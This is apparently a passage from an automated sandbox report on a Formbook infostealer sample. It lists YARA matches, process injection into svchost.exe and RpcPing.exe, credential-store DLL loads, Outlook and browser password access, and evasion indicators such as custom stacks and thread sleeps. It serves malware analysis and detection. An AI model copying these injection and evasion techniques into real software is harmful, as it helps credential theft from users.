            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02B3E3085_2_02B3E308
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02B3E7C35_2_02B3E7C3
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02B3E4245_2_02B3E424
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02B3CB135_2_02B3CB13
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02B3D8285_2_02B3D828
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0342B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03475130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03487E54 appears 101 times
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: String function: 02CB7E54 appears 110 times
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: String function: 02CDEA12 appears 86 times
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: String function: 02C5B970 appears 280 times
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: String function: 02CEF290 appears 105 times
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: String function: 02CA5130 appears 58 times
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: String function: 004115D7 appears 36 times
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: String function: 00416C70 appears 39 times
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: String function: 00445AE0 appears 65 times
            Source: N2Qncau2rN.exe, 00000000.00000003.1659170774.00000000047BD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs N2Qncau2rN.exe
            Source: N2Qncau2rN.exe, 00000000.00000003.1658523264.0000000004613000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs N2Qncau2rN.exe
            Source: N2Qncau2rN.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4128778951.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4128752269.0000000004BC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1888404688.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1886252240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.4131107461.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4122907990.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4126780482.0000000002730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1888965861.0000000006200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@17/10
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeFile created: C:\Users\user\AppData\Local\Temp\KeilyJump to behavior
            Source: N2Qncau2rN.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: RpcPing.exe, 00000005.00000002.4127083272.0000000002842000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.2079097179.0000000002876000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.2079097179.0000000002821000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.2079097179.0000000002842000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4127083272.0000000002876000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: N2Qncau2rN.exeReversingLabs: Detection: 71%
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeFile read: C:\Users\user\Desktop\N2Qncau2rN.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\N2Qncau2rN.exe "C:\Users\user\Desktop\N2Qncau2rN.exe"
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\N2Qncau2rN.exe"
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeProcess created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe"
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\N2Qncau2rN.exe"Jump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeProcess created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: credui.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: N2Qncau2rN.exeStatic file information: File size 1401699 > 1048576
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: auuGcaPMTDojV.exe, 00000003.00000000.1802625939.0000000000A0E000.00000002.00000001.01000000.00000004.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4125799190.0000000000A0E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: N2Qncau2rN.exe, 00000000.00000003.1657483680.0000000004690000.00000004.00001000.00020000.00000000.sdmp, N2Qncau2rN.exe, 00000000.00000003.1659461075.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1888606997.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1785147049.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1787099857.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1888606997.000000000359E000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129055443.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.1889918613.0000000002A85000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.1885758983.00000000028BC000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129055443.0000000002C30000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: RPCPing.pdbGCTL source: svchost.exe, 00000002.00000003.1850301385.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1850352705.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, auuGcaPMTDojV.exe, 00000003.00000003.2198579685.00000000007DB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: N2Qncau2rN.exe, 00000000.00000003.1657483680.0000000004690000.00000004.00001000.00020000.00000000.sdmp, N2Qncau2rN.exe, 00000000.00000003.1659461075.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1888606997.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1785147049.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1787099857.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1888606997.000000000359E000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, RpcPing.exe, 00000005.00000002.4129055443.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.1889918613.0000000002A85000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.1885758983.00000000028BC000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129055443.0000000002C30000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: RPCPing.pdb source: svchost.exe, 00000002.00000003.1850301385.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1850352705.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, auuGcaPMTDojV.exe, 00000003.00000003.2198579685.00000000007DB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: RpcPing.exe, 00000005.00000002.4129603004.000000000325C000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4127083272.00000000027C2000.00000004.00000020.00020000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000002B5C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2185961069.000000000D58C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: RpcPing.exe, 00000005.00000002.4129603004.000000000325C000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4127083272.00000000027C2000.00000004.00000020.00020000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000002B5C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2185961069.000000000D58C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: N2Qncau2rN.exeStatic PE information: real checksum: 0xa961f should be: 0x1655cc
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041206B push ebx; ret 2_2_00412074
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402011 push edx; iretd 2_2_00402032
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00407116 push esi; retf 2_2_00407117
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A9D8 push ebp; retf 2_2_0041A9D9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403210 push eax; ret 2_2_00403212
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00404334 push ebx; ret 2_2_00404335
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004143D7 pushfd ; ret 2_2_004143D8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401BBB pushad ; retf 2_2_00401BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A45F push esp; ret 2_2_0041A502
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A463 push esp; ret 2_2_0041A502
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041640E push edi; iretd 2_2_00416429
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A503 push esp; ret 2_2_0041A502
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401DE7 push ds; ret 2_2_00401DF3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411594 push es; ret 2_2_00411596
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00404E13 push edx; ret 2_2_00404E14
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00406690 push esp; iretd 2_2_00406691
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040A69A push ss; retf 2_2_0040A6A1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411739 push edx; ret 2_2_0041173A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401FC2 push eax; retf 2_2_00401FC5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00404FC3 push esp; iretd 2_2_00404FC4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034309AD push ecx; mov dword ptr [esp], ecx2_2_034309B6
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeCode function: 3_2_04D00C8E push edx; ret 3_2_04D00C8F
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeCode function: 3_2_04D104BE pushad ; retf B253h3_2_04D10507
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeCode function: 3_2_04D0D40F push es; ret 3_2_04D0D411
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeCode function: 3_2_04D0D5B4 push edx; ret 3_2_04D0D5B5
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeCode function: 3_2_04D06515 push ss; retf 3_2_04D0651C
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeCode function: 3_2_04D0250B push esp; iretd 3_2_04D0250C
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeCode function: 3_2_04D0DEE6 push ebx; ret 3_2_04D0DEEF
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeCode function: 3_2_04D00E3E push esp; iretd 3_2_04D00E3F
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeCode function: 3_2_04D02F91 push esi; retf 3_2_04D02F92
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeAPI/Special instruction interceptor: Address: 40DF244
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FF90818D324
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FF90818D7E4
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FF90818D944
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FF90818D504
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FF90818D544
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FF90818D1E4
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FF908190154
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FF90818DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E rdtsc 2_2_0347096E
            Source: C:\Windows\SysWOW64\RpcPing.exeWindow / User API: threadDelayed 9827Jump to behavior
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-87598
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeAPI coverage: 3.4 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\RpcPing.exe TID: 5360Thread sleep count: 147 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exe TID: 5360Thread sleep time: -294000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exe TID: 5360Thread sleep count: 9827 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exe TID: 5360Thread sleep time: -19654000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe TID: 5232Thread sleep time: -80000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe TID: 5232Thread sleep count: 35 > 30Jump to behavior
